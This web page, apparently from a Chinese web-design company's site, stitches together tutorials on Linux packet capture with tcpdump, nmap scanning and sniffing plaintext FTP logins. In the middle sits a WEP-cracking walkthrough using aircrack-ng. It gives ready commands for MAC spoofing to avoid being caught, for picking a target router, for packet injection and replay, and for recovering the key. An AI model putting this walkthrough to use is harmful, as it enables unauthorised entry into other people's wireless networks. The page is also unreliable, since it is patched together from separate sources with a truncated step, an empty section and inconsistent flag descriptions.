linux系統(tǒng)抓包命令 linux抓包指令詳解

Linux下如何抓指定IP的包

用tcpdum命令可以抓指定IP的包，具體命令為：

成都創(chuàng)新互聯(lián)專注于平陰企業(yè)網(wǎng)站建設(shè),響應(yīng)式網(wǎng)站,商城開發(fā)。平陰網(wǎng)站建設(shè)公司,為平陰等地區(qū)提供建站服務(wù)。全流程按需網(wǎng)站策劃，專業(yè)設(shè)計，全程項目跟蹤，成都創(chuàng)新互聯(lián)專業(yè)和態(tài)度為您提供的服務(wù)

tcpdump tcp -i eth1 -t -s 0 -c 100 and dst port 22 and src net 192.168.1.1 -w ./target.cap

參數(shù)解析：

tcp: ip icmp arp rarp 和 tcp、udp、icmp這些選項等都要放到第一個參數(shù)的位置，用來過濾數(shù)據(jù)報的類型。

-i eth1 : 只抓經(jīng)過接口eth1的包

-t : 不顯示時間戳

-s 0 : 抓取數(shù)據(jù)包時默認抓取長度為68字節(jié)。加上-S 0 后可以抓到完整的數(shù)據(jù)包

-c 100 : 只抓取100個數(shù)據(jù)包

dst port? 22 : 抓取目標(biāo)端口是22的數(shù)據(jù)包

src net 192.168.1.0/24 : 數(shù)據(jù)包的源網(wǎng)絡(luò)地址為192.168.1.1

-w ./target.cap : 保存成cap文件，方便用ethereal(即wireshark)分析

擴展資料

tcpdump語法格式：

tcpdump [-adeflnNOpqStvx][-c數(shù)據(jù)包數(shù)目][-dd][-ddd][-F表達文件][-i網(wǎng)絡(luò)界面][-r數(shù)據(jù)包文件][-s數(shù)據(jù)包大小][-tt][-T數(shù)據(jù)包類型][-vv][-w數(shù)據(jù)包文件][輸出數(shù)據(jù)欄位]

tcpdump主要參數(shù)說明：

1、-a 嘗試將網(wǎng)絡(luò)和廣播地址轉(zhuǎn)換成名稱。

2、-c數(shù)據(jù)包數(shù)目 收到指定的數(shù)據(jù)包數(shù)目后，就停止進行傾倒操作。

3、-d 把編譯過的數(shù)據(jù)包編碼轉(zhuǎn)換成可閱讀的格式，并傾倒到標(biāo)準(zhǔn)輸出。

4、-dd 把編譯過的數(shù)據(jù)包編碼轉(zhuǎn)換成C語言的格式，并傾倒到標(biāo)準(zhǔn)輸出。

5、-ddd 把編譯過的數(shù)據(jù)包編碼轉(zhuǎn)換成十進制數(shù)字的格式，并傾倒到標(biāo)準(zhǔn)輸出。

6、-e 在每列傾倒資料上顯示連接層級的文件頭。

7、-f 用數(shù)字顯示網(wǎng)際網(wǎng)絡(luò)地址。

8、-F表達文件 指定內(nèi)含表達方式的文件。

9、-i網(wǎng)絡(luò)界面 使用指定的網(wǎng)絡(luò)截面送出數(shù)據(jù)包。

10、-l 使用標(biāo)準(zhǔn)輸出列的緩沖區(qū)。

11、-n 不把主機的網(wǎng)絡(luò)地址轉(zhuǎn)換成名字。

12、-N 不列出域名。

airodump-ng linux下怎樣抓包

Aircrack-ng系列工具也有Windows 平臺版本，但是本人的小黑的始終不能在win下抓包，所以只能 棄 Windows 從Linux 了，另外 Windows 下掃描到的 AP 也比 Linux 下少了很多。其實 Windows 并不完整的支持 TCP/IP 協(xié)議族，有些協(xié)議Windows 直接丟棄不用。網(wǎng)絡(luò)本來從一開始就是 Unix 的天下，Windows 只是在后來加入了網(wǎng)絡(luò)的功能。

Aircrack-ng工具包有很多工具，我用到的工具主要有以下幾個：

airmon-ng 處理網(wǎng)卡工作模式

airodump-ng 抓包

aircrack-ng 破解

aireplay-ng 發(fā)包，干擾

另外還要用到以下 linux 命令:

ifconfig 查看修改網(wǎng)卡狀態(tài)和參數(shù)

macchanger 偽造 MAC

iwconfig 主要針對無線網(wǎng)卡的工具 (同 ifconfig)

iwlist 獲取無線網(wǎng)絡(luò)的更詳細信息

另外還有其他的 linux 基本命令，我就不提示了。

具體破解步驟：

1. 修改無線網(wǎng)卡狀態(tài)：先 dow

2. 偽造無線網(wǎng)卡的 MAC 地址：安全起見，減少被抓到的可能

3. 修改網(wǎng)卡工作模式：進入Monitor狀態(tài)，會產(chǎn)生一個虛擬的網(wǎng)卡

4. 修改無線網(wǎng)卡狀態(tài)： up

5. 查看網(wǎng)絡(luò)狀態(tài)，記錄下 AP 的 MAC 和本機的 MAC ，確定攻擊目標(biāo)

6. 監(jiān)聽抓包：生成 .cap 或 .ivs

7. 干擾無線網(wǎng)絡(luò)：截取無線數(shù)據(jù)包，發(fā)送垃圾數(shù)據(jù)包，用來獲得更多的有效數(shù)據(jù)包

8. 破解 .cap 或 .ivs ，獲得 WEP 密碼，完成破解

Crack Mode一共有5種請酌情使用還有網(wǎng)卡不一定是ath1也有可能是wifi0，ath0等等

ifconfig -a

ifconfig -a ath0 up

airmon-ng start wifi0 6

airodump-ng --ivs -w 目標(biāo)路由器IVS文件 -c 6 ath1

airodump-ng ath1

aireplay-ng -1 0 -e 目標(biāo)路由器SSID -a 目標(biāo)MAC -h 本機MAC ath1

----------- -2 Crack Mode-----------

aireplay-ng -2 -p 0841 -c ffffffffffff -b 目標(biāo)MAC -h 本機MAC ath1

----------- -3 Crack Mode-----------

aireplay-ng -3 -b 目標(biāo)MAC -h 本機MAC ath1

----------- -4 Crack Mode-----------

aireplay-ng -4 -b 目標(biāo)MAC -h 本機MAC ath1

packetforge-ng -0 -a 目標(biāo)MAC -h 本機MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp

aireplay-ng -2 -r MyArp -x 256 ath1

----------- -5 Crack Mode-----------

aireplay-ng -5 -b 目標(biāo)MAC -h 本機MAC ath1

packetforge-ng -0 -a 目標(biāo)MAC -h 本機MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp

aireplay-ng -2 -r MyArp -x 256 ath1

-----------Crack Key-----------

aircrack-ng -n 64 -b 目標(biāo)MAC 目標(biāo)路由器IVS文件-01.ivs

——————————————————————————————

　下面詳細介紹一下各個命令的基本用法（參照命令的英文說明）

1. ifconfig

用來配置網(wǎng)卡，我們這里主要用來 禁用和啟用 網(wǎng)卡：

ifconfig ath0 down

ifconfig ath0 up

禁用一下網(wǎng)卡的目的是為了下一步修改 MAC 。

2.macchanger

用來改變網(wǎng)卡的 MAC 地址，具體用法如下：

usage: macchanger [options] device

-h 顯示幫助

-V 顯示版本

-s 顯示當(dāng)前MAC

-e 不改變mac,使用硬件廠商寫入的MAC

-a 自動生成一個同類型的MAC，同廠商的

-A 自動生成一個不同類型的MAC，不同廠商的

-r 生成任意MAC

-l 顯示已知廠商的網(wǎng)卡MAC地址分配，這個很有用，可以根據(jù)MAC查出來是哪個廠商生產(chǎn)的產(chǎn)品

-m 設(shè)置一個自定義的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。

3.airmon-ng

啟動無線網(wǎng)卡進入 Monitor 模式，

useage: airmon-ng start|stop|check interface [channel]

start|stop|check啟動，停止，檢測

interface指定無線網(wǎng)卡

[channel] 監(jiān)聽頻道，現(xiàn)代大多數(shù)無線路由默認是 6，隨便掃描一下都是這個頻道，網(wǎng)管們應(yīng)該換換了

4.iwconfig

專用的無線網(wǎng)卡配置工具，用來配置特殊的網(wǎng)絡(luò)信息，不帶參數(shù)時顯示可用網(wǎng)絡(luò)。

useage：iwconfig interface [options]

[essid{NN|ON|OFF}] 指定essid號 開啟關(guān)閉

[nwid{NN|on|off}] 指定網(wǎng)絡(luò)id號 開啟關(guān)閉

[mode {managed|ad-hoc|....}] 指定無線網(wǎng)絡(luò)工作模式/類型

[freq N.NNNN[K|M|G]] 指定工作頻率

[channel N] 指定頻道

[ap {N|off|auto}] 指定AP號 關(guān)閉/自動

[sens N] sens 號

[nick N] nick 號

[rate {N|auto|fixed}] 速率控制

[rts {N|auto|fixed|off}] rts控制，如果不知道什么是RTS，那就回去好好去學(xué)網(wǎng)絡(luò)，不用往下看了

[frag {N|auto|fixed|off}] 碎片控制

[enc {NNNN-NNNN|off}] 范圍

[power {period N|timeout N}] 電源 頻率/超時

[retry {limit N|lifetime N}] 重試 限次/超時

[txpower N{mw|dBm}] 功率 毫瓦/分貝

[commit] 處理

5.iwlist

主要用來顯示無線網(wǎng)卡的一些附加信息,同上

useage: iwlist [interface] options

scanning 掃描

frequency 頻率

channel 頻道

bitrate 速率

rate 速率

encryption 加密

key 密鑰

power 電源

txpower 功率

ap ap

accespoints ap

peers 直連

event 事件

6.airodump-ng

抓包工具,我最喜歡用的,詳細用法如下:

usage: airodump-ng options interface[,interface,...]

Options:

--ivs :僅將抓取信息保存為 .ivs

--gpsd :使用 GPSd

--write prefix :保存為指定日文件名,我一般用這個,尤其是多個網(wǎng)絡(luò)時,指定了也好區(qū)分

-w :同 --write

--beacons :保存所有的 beacons ,默認情況況下是丟棄那些無用的數(shù)據(jù)包的

--update secs :顯示更新延遲,沒有用過

--showack :顯示ack/cts/rts狀態(tài),還是那句,不知道rts就不用看了

-h :隱藏已知的,配合上面的選項使用

-f msecs :跳頻時間

--berlin secs :無數(shù)據(jù)包接收時延遲顯示的時間,這句不太好翻譯,意思是當(dāng)那個信號發(fā)出設(shè)備沒有發(fā)出數(shù)據(jù)包多少時間之后,就停止對它的監(jiān)視.默認120秒.建議學(xué)好英文去讀原文,翻譯的都會有出入,這是我的理解.(mhy_mhy注)

-r file :從指定的文件讀取數(shù)據(jù)包.我也想有人給我抓好包放哪里,呵呵

Filter options:

--encrypt suite : 使用密碼序列過濾 AP

--netmask netmask : 使用掩碼過濾 AP

--bssid bssid : 使用 bssid 過濾 AP

-a : 過濾無關(guān)的客戶端

默認情況下使用2.4Ghz,你也可以指定其他的頻率,通過以下命令操作:

--channel channels:指定頻道

--band abg :制定帶寬

-C frequencies :指定頻率MHz

--cswitch method : 設(shè)置頻道交換方式

0 : FIFO (default) 先進先出(默認)

1 : Round Robin 循環(huán)

2 : Hop on last 最后一跳

-s : 同上

--help : 顯示使用方法,翻譯到這里,感覺還是英文的貼切一點,建議讀原文

7.aireplay-ng

linux下怎么抓包

tcpdump，就可以用這個抓包了，具體使用 tcpdump -vvv -nn -port 80 -w /tmp/file，你也可以用man tcpdump 查看此命令的具體使用

在linux命令行環(huán)境下如何抓取網(wǎng)絡(luò)數(shù)據(jù)包？

? 眾所周知，在Windows下開發(fā)運行環(huán)境下，在調(diào)試網(wǎng)絡(luò)環(huán)境時，可以可以很方便的借助wireshark等軟件進行抓包分析；并且在linux或者Ubuntu等桌面版里也可以進行安裝抓包工具進行抓包分析，但總有一些情況，無法直接運用工具（比如一些沒有界面的linux環(huán)境系統(tǒng)中），則此時我們就需要使用到最簡單的tcpdump命令進行網(wǎng)絡(luò)抓包。

? 一般的，linux下抓包時，抓取特定的網(wǎng)絡(luò)數(shù)據(jù)包到當(dāng)前文件夾下的文件中，再把文件拷貝出來利用Windows下的wireshark軟件進行分析。

tcpdump命令詳解：（簡單舉例）

? 1、抓取到的文件為filename.cap，然后將此文件拷貝到Windows下，使用wireshar打開后，即可對此文件進行分析。

? 2、eth0 是主機的網(wǎng)絡(luò)適配器名稱，具體的參數(shù)值可以在linux命令行窗口中通過 ifconfig 指令查詢。

Linux 系統(tǒng)掃描nmap與tcpdump抓包

NMAP掃描

一款強大的網(wǎng)絡(luò)探測利器工具

支持多種探測技術(shù)

--ping掃描

--多端口掃描

-- TCP/IP指紋校驗

為什么需要掃描?

以獲取一些公開/非公開信息為目的

--檢測潛在風(fēng)險

--查找可攻擊目標(biāo)

--收集設(shè)備/主機/系統(tǒng)/軟件信息

--發(fā)現(xiàn)可利用的安全漏洞

基本用法

nmap [掃描類型] [選項] 掃描目標(biāo)...

常用的掃描類型

常用選項

-sS TCP SYN掃描(半開) 該方式發(fā)送SYN到目標(biāo)端口，如果收到SYN/ACK回復(fù)，那么判斷端口是開放的；如果收到RST包，說明該端口是關(guān)閉的。簡單理解就是3次握手只完成一半就可以判斷端口是否打開,提高掃描速度

-sT TCP 連接掃描(全開)

-sU UDP掃描

-sP ICMP掃描

-sV 探測打開的端口對應(yīng)的服務(wù)版本信息

-A 目標(biāo)系統(tǒng)全面分析 (可能會比較慢)

-p 掃描指定端口

1 ) 檢查目標(biāo)主機是否能ping通

2）檢查目標(biāo)主機所開啟的TCP服務(wù)

3 ) 檢查192.168.4.0/24網(wǎng)段內(nèi)哪些主機開啟了FTP、SSH服務(wù)

4）檢查目標(biāo)主機所開啟的UDP服務(wù)

5 ) 探測打開的端口對應(yīng)的服務(wù)版本信息

6）全面分析目標(biāo)主機192.168.4.100的操作系統(tǒng)信息

tcpdump

命令行抓取數(shù)據(jù)包工具

基本用法

tcpdump [選項] [過濾條件]

常見監(jiān)控選項

-i，指定監(jiān)控的網(wǎng)絡(luò)接口（默認監(jiān)聽第一個網(wǎng)卡）

-A，轉(zhuǎn)換為 ACSII 碼，以方便閱讀

-w，將數(shù)據(jù)包信息保存到指定文件

-r，從指定文件讀取數(shù)據(jù)包信息

常用的過濾條件：

類型：host、net、port、portrange

方向：src、dst

協(xié)議：tcp、udp、ip、wlan、arp、……

多個條件組合：and、or、not

案例1

案例2:使用tcpdump分析FTP訪問中的明文交換信息

1 ) 安裝部署vsftpd服務(wù)

2 ) 并啟動tcpdump等待抓包

執(zhí)行tcpdump命令行，添加適當(dāng)?shù)倪^濾條件，只抓取訪問主機192.168.4.100的21端口的數(shù)據(jù)通信 ，并轉(zhuǎn)換為ASCII碼格式的易讀文本。

3 ) case100作為客戶端訪問case254服務(wù)端

4 ) 查看tcpdump抓包

5 ) 再次使用tcpdump抓包，使用-w選項可以將抓取的數(shù)據(jù)包另存為文件，方便后期慢慢分析。

6 ) tcpdump命令的-r選項，可以去讀之前抓取的歷史數(shù)據(jù)文件

文章名稱：linux系統(tǒng)抓包命令 linux抓包指令詳解
網(wǎng)頁URL：http://muchs.cn/article4/hgecie.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供外貿(mào)建站、動態(tài)網(wǎng)站、建站公司、網(wǎng)站維護、網(wǎng)站營銷、自適應(yīng)網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)